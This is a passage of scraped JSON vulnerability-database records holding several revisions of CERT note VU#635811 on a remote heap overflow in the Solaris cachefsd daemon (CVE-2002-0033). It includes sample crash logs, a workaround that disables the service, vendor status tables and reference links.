Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability. \n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n \n--- \n \n### Impact\n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows: \n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun| | 06 May 2002| 06 May 2002 \nCray| | -| 13 May 2002 \nFujitsu| | -| 14 May 2002 \nHewlett Packard| | 06 May 2002| 07 May 2002 \nIBM| | 06 May 2002| 06 May 2002 \nNortel Networks| | -| 13 May 2002 \nOpenBSD| | 06 May 2002| 06 May 2002 \nSGI| | 06 May 2002| 06 May 2002 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23635811 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Credit\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.\n\nThis document was written by Jason Rafail and Jeffrey Havrilla.\n\n### Other Information\n\n * CVE IDs: [CAN-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033>)\n * CERT Advisory: [CA-2002-11](<http://www.cert.org/advisories/CA-2002-11.html>)\n * Date Public: 05 May 2002\n * Date First Published: 06 May 2002\n * Date Last Updated: 14 May 2002\n * Severity Metric: 52.92\n * Document Revision: 31\n\n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html", "http://www.cert.org/advisories/CA-2002-11.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033", "http://www.kb.cert.org/vuls/id/161931", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309"], "cvelist": ["CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033"], "lastseen": "2018-08-30T20:36:43", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2018-08-30T20:36:43", "differentElements": ["cvss"], "edition": 3}, {"bulletin": {"id": "VU:635811", "hash": "9c7ad081d9669c07882689f16b5281d1", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview\n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description\n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability. \n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n \n--- \n \n### Impact\n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows: \n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun| | 06 May 2002| 06 May 2002 \nCray| | -| 13 May 2002 \nFujitsu| | -| 14 May 2002 \nHewlett Packard| | 06 May 2002| 07 May 2002 \nIBM| | 06 May 2002| 06 May 2002 \nNortel Networks| | -| 13 May 2002 \nOpenBSD| | 06 May 2002| 06 May 2002 \nSGI| | 06 May 2002| 06 May 2002 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23635811 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Credit\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.\n\nThis document was written by Jason Rafail and Jeffrey Havrilla.\n\n### Other Information\n\n * CVE IDs: [CAN-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033>)\n * CERT Advisory: [CA-2002-11](<http://www.cert.org/advisories/CA-2002-11.html>)\n * Date Public: 05 May 2002\n * Date First Published: 06 May 2002\n * Date Last Updated: 14 May 2002\n * Severity Metric: 52.92\n * Document Revision: 31\n\n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html", "http://www.cert.org/advisories/CA-2002-11.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033", "http://www.kb.cert.org/vuls/id/161931", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309"], "cvelist": ["CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033"], "lastseen": "2018-08-31T02:38:16", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2018-08-31T02:38:16", "differentElements": ["cvelist", "description", "modified", "references"], "edition": 4}, {"bulletin": {"id": "VU:635811", "hash": "e694d10e4a45d3513b2eb472aa905661", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview \n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description \n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability.\n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n--- \n \n### Impact \n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows:\n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Vendor Information\n\n635811\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Sun \n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Cray \n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCray, Inc. is not vulnerable since cachefs is not supported under Unicos and Unicos/mk.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Fujitsu \n\nUpdated: May 14, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nUXP/V is not vulnerable, because it does not have Cachefs and similar functionalities.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Hewlett Packard \n\nNotified: May 06, 2002 Updated: May 07, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHP-UX is not vulnerable because it does not use cachefsd.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ IBM \n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIBM's AIX operating system, all versions, is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Nortel Networks \n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNortel Networks products and solutions using the affected Sun Solaris operating systems do not utilize the NFS/RPC file system cachefs daemon. Nortel Networks recommends following the mitigating practices in Sun Microsystems Inc.'s Alert Notification.; this will not impact these Nortel Networks products and solutions. \n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n\n\n[www.nortelnetworks.com/help/contact/global/](<www.nortelnetworks.com/help/contact/global/>)\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ OpenBSD \n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ SGI \n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI does not ship with SUN cachefsd, so IRIX is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Credit\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance. \n\nThis document was written by Jason Rafail and Jeffrey Havrilla. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0033>) \n---|--- \n**CERT Advisory:** | [CA-2002-11 ](<http://www.cert.org/advisories/CA-2002-11.html>) \n**Severity Metric:****** | 52.92 \n**Date Public:** | 2002-05-05 \n**Date First Published:** | 2002-05-06 \n**Date Last Updated: ** | 2002-05-14 13:58 UTC \n**Document Revision: ** | 31 \n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T13:58:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html"], "cvelist": ["CVE-2002-0033"], "lastseen": "2018-12-25T20:20:52", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0033"]}, {"type": "osvdb", "idList": ["OSVDB:779"]}, {"type": "saint", "idList": ["SAINT:3AEC527DDF0F8FD500158F5102FDDEE0", "SAINT:8FE2C21CB99188D66319904930E9E2EF", "SAINT:B3F3037AA3E9EA0D7F6A527A77125B8F"]}, {"type": "exploitdb", "idList": ["EDB-ID:21437"]}, {"type": "nessus", "idList": ["CACHEFSD_OVERFLOW.NASL"]}, {"type": "cisco", "idList": ["CISCO-SA-20020724-SOLARIS-CACHEFS"]}], "modified": "2018-12-25T20:20:52"}}, "objectVersion": "1.4"}, "lastseen": "2018-12-25T20:20:52", "differentElements": ["description"], "edition": 5}, {"bulletin": {"id": "VU:635811", "hash": "458f520134931feb7d54df475e715481", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview \n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description \n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability.\n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n--- \n \n### Impact \n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows:\n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Vendor Information\n\n635811\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Sun\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Cray\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCray, Inc. is not vulnerable since cachefs is not supported under Unicos and Unicos/mk.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Fujitsu\n\nUpdated: May 14, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nUXP/V is not vulnerable, because it does not have Cachefs and similar functionalities.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Hewlett Packard\n\nNotified: May 06, 2002 Updated: May 07, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHP-UX is not vulnerable because it does not use cachefsd.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional 